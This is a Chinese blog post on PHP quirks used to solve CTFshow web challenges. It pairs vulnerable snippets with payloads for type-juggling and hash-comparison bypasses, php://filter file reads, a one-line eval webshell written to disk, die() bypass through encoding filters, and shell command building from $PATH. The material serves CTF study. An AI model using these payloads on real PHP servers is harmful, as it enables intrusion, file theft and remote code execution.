php特性
php特性
Sherlock知识
1、数组绕过正则表达式
1 | if(preg_match("/[0-9]/", $num)){ |
preg_match第二个参数要求是字符串,如果传入数组则不会进入if语句
payload:num[]=1
2、intval函数的使用
1 | intval( mixed $value, int $base = 10) : int |
如果 base 是 0,通过检测 value 的格式来决定使用的进制:
◦ 如果字符串包括了 “0x” (或 “0X”) 的前缀,使用 16 进制 (hex);否则,
◦ 如果字符串以 “0” 开始,使用 8 进制(octal);否则,
◦ 将使用 10 进制 (decimal)
1 | if($num==="4476"){ |
科学计数法也可以绕过
1 | intval('4476.0')===4476 小数点 |
payload:num=4476.0
3、正则表达式修饰符&web91
1 | if(preg_match('/^php$/im', $a)){ |
^
匹配字符串的开头,i 不区分(ignore)大小写;$
匹配字符串的末尾,m多(more)行匹配,若有换行符则以换行符分割,按行匹配
payload:%0aphp
,第一行匹配换行后有php故通过,第二个不符合php开头php结尾故不通过
4、highlight_file路径&web96
highlight_file的参数可以是路径的
1 | if($_GET['u']=='flag.php'){ |
if语句只比对字符串,highlight_file可以写路径,故payload有多种解法:
1 | /var/www/html/flag.php 绝对路径 |
5、md5比较缺陷
PHP中hash比较是存在缺陷的,MD5无法处理数组,如果传入数组则返回NULL,两个NULL是强相等的
1 | if ($_POST['a'] != $_POST['b']){ |
不同数据强相等
payload:a[]=1&b[]=2
md5弱比较,使用了强制类型转换后不再接收数组
1 | $a=(string)$a; |
md5弱比较,为0e开头的会被识别为科学记数法,结果均为0,所以只需找两个md5后都为0e开头且0e后面均为数字的值即可。
不同数据弱相等
payload: a=QNKCDZO&b=240610708
MD5等于自身,如md5($a)==$a
,php弱比较会把0e开头识别为科学计数法,结果均为0,所以此时需要找到一个MD5加密前后都是0e开头的,如0e215962017
md5强碰撞
1 | $a=(string)$a; |
6、三目运算符的理解+变量覆盖&web98
1 |
|
第一行,GET被设置,就可以用POST覆盖GET的值。中间两行意义不大,是flag就被COOKIE覆盖,然后被SERVER覆盖,不是flag被赋值flag然后条件成立也是被SERVER覆盖。而且这个被覆盖的GET没有指定,任意都行,第四行才是关键,等于flag就输出flag,不等于显示源码。所以只需要传入一个任意的GET保证$_GET
是被设置的。然后POST一个覆盖它
第一行,使用GET方式接收数据,若是GET传参,则将GET替换成POST 先用GET 往里传东西,随便传 例如: url?1
然后根据最后一行 hackbar通过POST方式往里传HTTP_FLAG=flag即可
payload:get:1=1 post:HTTP_FLAG=flag
7、php弱类型比较&web99
经典
1 | $allow = array(); |
对于代码的解释:
$allow = array();
: 创建了一个名为$allow
的空数组,用于存储允许操作的文件名。for ($i=36; $i < 0x36d; $i++) { array_push($allow, rand(1,$i)); }
: 这是一个 for 循环,从十进制数 36 到十六进制数 0x36d(十进制数为 877)循环遍历,每次循环将一个随机数(范围在 1 到当前循环变量$i
的值之间)添加到$allow
数组中。这样做的目的是生成一个随机的允许操作的文件名数组。if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
: 这行代码首先检查是否设置了 GET 请求参数'n'
,并且检查参数值是否存在于$allow
数组中。如果这两个条件都满足,则继续执行下面的代码。file_put_contents($_GET['n'], $_POST['content']);
: 这行代码使用file_put_contents()
函数将 POST 请求参数'content'
的内容写入到名为'n'
的文件中。这里的$_GET['n']
是文件名,$_POST['content']
是要写入的文件内容。
弱比较字符串1.php与1返回true。array_push
这个函数往里填数字1,则是int类型,in_array使用的就是==弱比较。所以,如果数组里有数字1,与字符串1.php比较时是返回true的。注意,$array( 1 , ‘2’ , ‘3’ ),这里1是int型,2和3都是string类型。
这道题,每次生成随机数都包含1,所以1在数组中的可能最大。
payload:n=1.php post:content=<?php eval($_POST[1]);?>
只要,然后蚁剑直接连
8、and与&&的区别
1 |
|
and
运算符优先级低于 =
,&&
运算符优先级高于 =
9、反射类ReflectionClass&web101
反射类还不太懂,但做题都是直接输出这个类echo new ReflectionClass('类名');
,可以获得类的反射对象(包含元数据信息)。
元数据对象(包含class的所有属性/方法的元数据信息)
1 |
|
payload:?v1=1&v2=echo new Reflectionclass&v3=;
flag中有些字符经过ACSII码变换,好像还少了一位,爆破即可(这步目前还不会操作)
10、is_numeric与hex2bin
is_numeric在PHP5中是可以识别十六进制的,hex2bin参数不能带0x
字符串可以被is_numeric()函数解析成数字
11、sha1比较缺陷&web104
sha1无法处理数组,如下可使用a[]=1&b[]=1数组绕过
1 | if($a==$b){ |
但MD5或者sha1这种如果强制类型转换后,就不接受数组了,这个时候就要找真正的编码后相同的了,如
1 | aaroZmOk |
12、PHP双$($$)的变量覆盖
在双写$的时候,属于动态变量,就是后面的变量值作为新的变量名
1 | $test="a23"; $test等于a23 |
13、parse_str函数的使用
parse_str会把字符串解析为变量,大部分是传入的多个值
1 | $a="q=123&p=456"; |
php8版本必须要有第二个参数,php7不影响使用但会警告一下
14、ereg %00正则截断&web108
ereg PHP5.3废弃了,功能可以由preg_match代替,ereg有个截断漏洞,字符串里包括%00就只匹配%00之前的内容。所以可以前面根据正则改,后面是执行语句,如果有strrev() 这种字符串反转函数配合用更好。
1 |
|
payload:?c=w%00778
15、迭代器获取当前目录(getcwd())&web109&web110
FilesystemIterator可以获得文件目录,参数需要 .
或者具体路径,**getcwd()**这个函数可以获取当前文件路径,二者在一定条件下配合使用较好
1 |
|
payload:?v1=FilesystemIterator&v2=getcwd
16、$GLOBALS全局变量的使用&web111
$GLOBALS — 引用全局作用域中可用的全部变量
一个包含了全部变量的全局组合数组。变量的名字就是数组的键。
构造出var_dump($GLOBALS);可以输出全部变量值,包括自定义
1 |
|
$$v1 = &$$v2;
:在这句代码中,$v1和$v2的值是一个变量名,然后右侧变量的值会赋值给左侧变量
按照我们所掌握的,$v1可以是任意值,所以构造playload为:?v1=ctfshow&v2=GLOBALS
,最后得到了所有变量的值,然后可以看到flag其实就是变量flag的值
17、php伪协议绕过is_file;highlight_file对于php伪协议的使用&web112&web114
is_file判断给定文件名是否为一个正常的文件,返回值为布尔类型。is_file会认为php伪协议不是文件。但highlight_file认为伪协议可以是文件。
1 | if(! is_file($file)){ |
如上的代码,可以传入php伪协议进行绕过并且显示含有flag的文件。若有过滤,可以换其他伪协议或改编码方式
1 |
|
本题题目过滤掉了一部分的过滤器,但是还有许多其他过滤器可以使用,当然本题我们也可以不适用过滤器
payload为:?file=php://filter/resource=flag.php
18、多写根目录绕过is_file&web113
在linux中/proc/self/root是指向根目录的,也就是如果在命令行中输入ls /proc/self/root,其实显示的内容是根目录下的内容
这利用函数所能处理的长度限制进行目录溢出: 原理:/proc/self/root代表根目录,进行目录溢出,超过is_file能处理的最大长度就不认为是个文件了
如上面的代码,也可以用下面payload代替
1 | file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php |
这个按理说也是文件的,但is_file认为不是
19、trim函数的绕过+is_numeric绕过&web115
这两个函数一起检测时,is_numeric
认为内容里有%09 %0a %0b %0c %0d %20也算数字,跟trim一起测试一下
1 | for ($i=0; $i <=128 ; $i++) { |
除了+-.号以外还有只剩下%0c也就是换页符了,trim默认时没有剔除%0c。形如以下代码可以绕过
1 | if(is_numeric($num) and $num!=='36' and trim($num)!=='36'){ |
payload:num=%0c36
20、绕过死亡die(利用过滤器UCS-2LE UCS-2BE)
1 | function filter($x){ |
这道看了羽师傅wp,过滤了许多协议,这是取一个 UCS-2LE UCS-2BE
1 | payload: |
这会将字符两位两位交换,file_put_contents在写入的时候会破坏那句die,但contents那句恢复原貌,可以执行
21、通过内置bash命令构造命令
在许多命令被过滤时,可以一个字母一个字母得构造,而这些字母从内置变量里面截,比如构造nl
,可以写为下面这种方式
1 | ${PATH:14:1}${PATH:5:1} |
在linux中可以用~
获取变量的最后几位,也可以写为${PATH:~0}${PWD:~0}
,字母与0作用一样,${PATH:~A}${PWD:~A}
也是nl,flag.php也过滤了的话可以用????.???,具体情况,具体对待
22、PHP变量名非法字符&web123
比如传入AA_BB.CC这个变量,PHP是不允许变量名中含有.
的,会默认将不合法字符替换为_
,如下:
1 |
|
但输入AA[BB.CC
它就只替换 [
输出 array(1) { [“AA_BB.CC”]=> string(2) “14” }
1 |
|
这题post传进去的变量CTF_SHOW和变量CTF_SHOW.COM都不能为空,然后变量fl0g为空才能够满足条件
但是变量名CTF_SHOW.COM中有非法字符,按照上面的方法进行绕过,所以构造的payload为:CTF_SHOW=1&CTF[SHOW.COM=1&fun=echo $flag
23、gettext拓展的使用
1 | var_dump(call_user_func($f1,$f2)); |
如以上代码,多重过滤后,f1可以为gettext
,f2可以为phpinfo
,如果过滤更为严格,更改ini文件里的拓展后, _()
等效于 gettext()
1 |
|
24、正则最大回溯次数绕过
PHP 为了防止正则表达式的拒绝服务攻击(reDOS),给 pcre 设定了一个回溯次数上限 pcre.backtrack_limit
回溯次数上限默认是 100 万。如果回溯次数超过了 100 万,preg_match 将不再返回非 1 和 0,而是 false。
也就是说前面100万个字母,后面是语句就好,如下面的例子
1 | if(preg_match('/.+?ABC/is', $f)){ |
前面100万个字母后面ABC就可以echo $flag
25、调用类中的函数
->用于动态语境处理某个类的某个实例
::可以调用一个静态的、不依赖于其他初始化的类方法
也就是说双冒号不用实例化类就可以调用类中的静态方法
1 | class ctfshow |
这个传入ctfshow=ctfshow::getFlag即可
26、return绕过
eval("return 1;phpinfo();");
会发现是无法执行phpinfo()的,但是php中有个有意思的地方,数字是可以和命令进行一些运算的,例如 1-phpinfo();
是可以执行phpinfo()命令的。
题目
web89
1 | include("flag.php"); |
preg_match当检测的变量是数组的时候会报错并返回0。而intval函数当传入的变量也是数组的时候,会返回1;所以可以通过数组绕过
web90(intval)
1 | include("flag.php"); |
payload:?num=4476.0
web92(intval)
1 | include("flag.php"); |
由于 $num==4476
是弱比较,对于类型不看重,只要最后的值是一样的就行,所以之前的科学计数法什么的都不能够成功绕过,所以需要把4476转为8进制等其他进制的数字来绕过
web93(intval)
1 | include("flag.php"); |
八进制绕过:?num=010574
web94(intval)
1 | include("flag.php"); |
strpos
函数是PHP中用于查找字符串中第一次出现指定子字符串的位置的函数。
strpos($num, "0")
: $num
是一个字符串,想要查找的子字符串是 “0”
题目里要求输入的内容里面必须包含0,并且不包含字母,不能强等于4476,在经过intval函数后还要等于4476,所以payload:num=4476.0
web95(intval)
1 | include("flag.php"); |
可以通过八进制绕过,但是前面必须多加一个字节:?num=+010574
web97(md5)
1 | include("flag.php"); |
数组绕过:a[]=1&b[]=2
web100
1 |
|
is_numeric()
函数用于判断一个变量是否为数字或数字字符串。如果变量是数字或数字字符串,则返回 true
,否则返回 false
在PHP中,逻辑运算符and
会比=
的优先级低,所以在这个表达式中,=
会先执行,然后才是and
,所以当其中一个为数字,另外两个不是数字时,$v0
的值将取决于第一个条件的结果,因为逻辑运算符and
会被视为最后一个操作符。因此,$v0
将被赋值为第一个条件的结果,而不会考虑后续条件。
payload:?v1=1&v2=var_dump($ctfshow)&v3=/**/;
web102
1 |
|
call_user_func() 调用方法或变量,第一个参数是调用的对象,第二个参数是被调用对象的参数
file_put_contents() 用来写文件进去,第一个参数是文件名,第二个参数是需要写进文件中的内容,文件名支持伪协议
payload: 参数分析: v1是调用方法
v2是数字字符串,且是写进文件中的内容 v3是文件名(可通过伪协议来创建)
v3=php://filter/write=convert.base64-decode/resource=2.php
v2:写进2.php的内容 ——> 查看当前页面源码;<?=cat *
; ——> 转为base64为PD89YGNhdCAqYDs ——>转为16进制的ascii码为5044383959474e6864434171594473——>绕过截断,在前面随意加两位数字225044383959474e6864434171594473 v1:将数字字符串还原为base64码 ——> hex2bin
最终payload: v1=hex2bin v2=225044383959474e6864434171594473 v3=php://filter/write=convert.base64-decode/resource=2.php
web105
1 |
|
payload:?suces=flag;post:error=suces
1 | $key=suces,$suces=$flag,$error=$suces=$flag |
web107
1 |
|
payload:get:?v3=0;post:v1=flag=cfcd208495d565ef66e7dff9f98764da
web125
1 |
|
与上一题相比多禁止flag|GLOBALS|echo|var_dump|print
,因此我们需要换一种思路
我们可以利用include函数来包含flag.php
因此我们post传参:CTF_SHOW=1&CTF[SHOW.COM=1&fun=include$_GET[1]
,get传参:?1=php://filter/convert.base64-encode/resource=flag.php
得到base64编码后的文件内容,拿去解密后就可以得到flag了
引用
来源: Tajang的大千世界
文章作者: Tajang
文章链接: https://ctfking.com/2021/07/14/php-te-xing-zong-jie/